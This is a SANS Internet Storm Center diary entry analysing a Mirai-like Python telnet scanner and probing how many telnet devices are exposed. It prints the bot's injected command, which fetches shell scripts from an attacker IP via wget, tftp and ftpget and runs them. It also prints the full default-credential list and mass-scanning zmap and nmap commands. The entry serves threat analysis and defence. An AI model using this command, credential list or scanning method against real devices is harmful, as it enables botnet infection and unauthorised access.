Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Mirai-alike Python Scanner

Published: 2020-10-20
Last Updated: 2020-10-20 06:36:59 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Last week, I found an interesting Python script that behaves like a Mirai bot[1]. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59[2]. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner.

Here are the commands injected when a device is found with vulnerable credentials:

rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send

The IP address 45.148.10.84 is offline at the moment but has already a bad reputation and is present in multiple blocklists.

Here is the list of credential pairs tested:

combo = [
        "root:root",
        "root:",
        "admin:admin",
        "telnet:telnet",
        "support:support",
        "user:user",
        "admin:",
        "admin:password",
        "root:vizxv",
        "root:admin",
        "root:xc3511",
        "root:888888",
        "root:xmhdipc",
        "root:default",
        "root:juantech",
        "root:123456",
        "root:54321",
        "root:12345",
        "root:pass",
        "ubnt:ubnt",
        "root:klv1234",
        "root:Zte521",
        "root:hi3518",
        "root:jvbzd",
        "root:anko",
        "root:zlxx.",
        "root:7ujMko0vizxv",
        "root:7ujMko0admin",
        "root:system",
        "root:ikwb",
        "root:dreambox",
        "root:user",
        "root:realtek",
        "root:00000000",
        "admin:1111111",
        "admin:1234",
        "admin:12345",
        "admin:54321",
        "admin:123456",
        "admin:7ujMko0admin",
        "admin:1234",
        "admin:pass",
        "admin:meinsm",
        "admin:admin1234",
        "root:1111",
        "admin:smcadmin",
        "admin:1111",
        "root:666666",
        "root:password",
        "root:1234",
        "root:klv123",
        "Administrator:admin",
        "service:service",
        "supervisor:supervisor",
        "guest:guest",
        "guest:12345",
        "guest:12345",
        "admin1:password",
        "administrator:1234",
        "666666:666666",
        "888888:888888",
        "tech:tech",
        "mother:fucker"
]

The script is pretty well written and is multi-threaded to speed up the scan:

for l in xrange(threads):
    try:
        t = threading.Thread(target=worker)
        t.start()
    except:
        pass

The script does not implement a random IP address generator, it just uses the zmap[3] scanner:

zmap -p23 -N 10000 -f saddr -q --verbosity=0

This command will return 10000 IP addresses that expose a telnet port. 

The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface into the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:

nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n

I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interesting, a found some devices still bricked by the BrickerBot:

# telnet x.x.x.x
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.

Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020):
  hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76

Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020)
  hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86

DeepPaste is temperamental (unreachable 75% of time) so if the links are not
loading then try again later.

Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers..
             Still WIP but seen some positive impact over the last few days/weeks.
Update 10/6: ..and Totolink.. 10/9: some new tricks for netis, TVT and Tata Consulting.. what next?
Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last

(none) login:

I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, your IP will be logged, etc. Please, don't waste your time to implement such unuseful banners, just get rid of telnet!

[1] https://www.cyber.nj.gov/threat-center/threat-profiles/botnet-variants/mirai-botnet
[2] https://www.virustotal.com/gui/file/89daf232e0658103883fa05b8968093675b5aa4b6be3fdbd46757144095daf64/details
[3] https://github.com/zmap/zmap

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

File Selection Gaffe
Oct 18th 2020
2 days ago by DidierStevens (0 comments)

CVE-2020-5135 - Buffer Overflow in SonicWall VPNs - Patch Now
Oct 17th 2020
3 days ago by Rick (0 comments)

Traffic Analysis Quiz: Ugly-Wolf.net
Oct 16th 2020
4 days ago by Brad (0 comments)

CVE-2020-16898: Windows ICMPv6 Router Advertisement RRDNS Option Remote Code Execution Vulnerability
Oct 15th 2020
5 days ago by Johannes (0 comments)

Nicely Obfuscated Python RAT
Oct 15th 2020
5 days ago by Xme (0 comments)

More TA551 (Shathak) Word docs push IcedID (Bokbot)
Oct 14th 2020
6 days ago by Brad (0 comments)

Microsoft October 2020 Patch Tuesday
Oct 13th 2020
1 week ago by Renato (0 comments)

View All Diaries →

Latest Discussions

Gmail hacked vis MS Outlook / request.zip virus/malware
created Oct 13th 2020
1 week ago by Anonymous (2 replies)

Why is the entire community so... I don't know the words...
created Sep 8th 2020
1 month ago by Everseeker (0 replies)

I can not find the Bluetooth channel!
created Aug 31st 2020
1 month ago by Martin (0 replies)

Fellow Cyber Security Pro's, where do you get your regular feeds of information?
created Aug 11th 2020
2 months ago by Anonymous (0 replies)

Most important information security training and certifications
created Aug 10th 2020
2 months ago by Anonymous (0 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
1 year ago by Brad (0 comments)

Open Packaging Conventions
Oct 10th 2020
1 week ago by DidierStevens (0 comments)

Traffic Analysis Quiz: Ugly-Wolf.net
Oct 16th 2020
4 days ago by Brad (0 comments)

What's in Your Clipboard? Pillaging and Protecting the Clipboard
Sep 11th 2020
1 month ago by Rob VandenBrink (0 comments)

Today, Nobody is Going to Attack You.
Oct 7th 2020
1 week ago by Johannes (0 comments)

send lots of email to money@stifortunes.com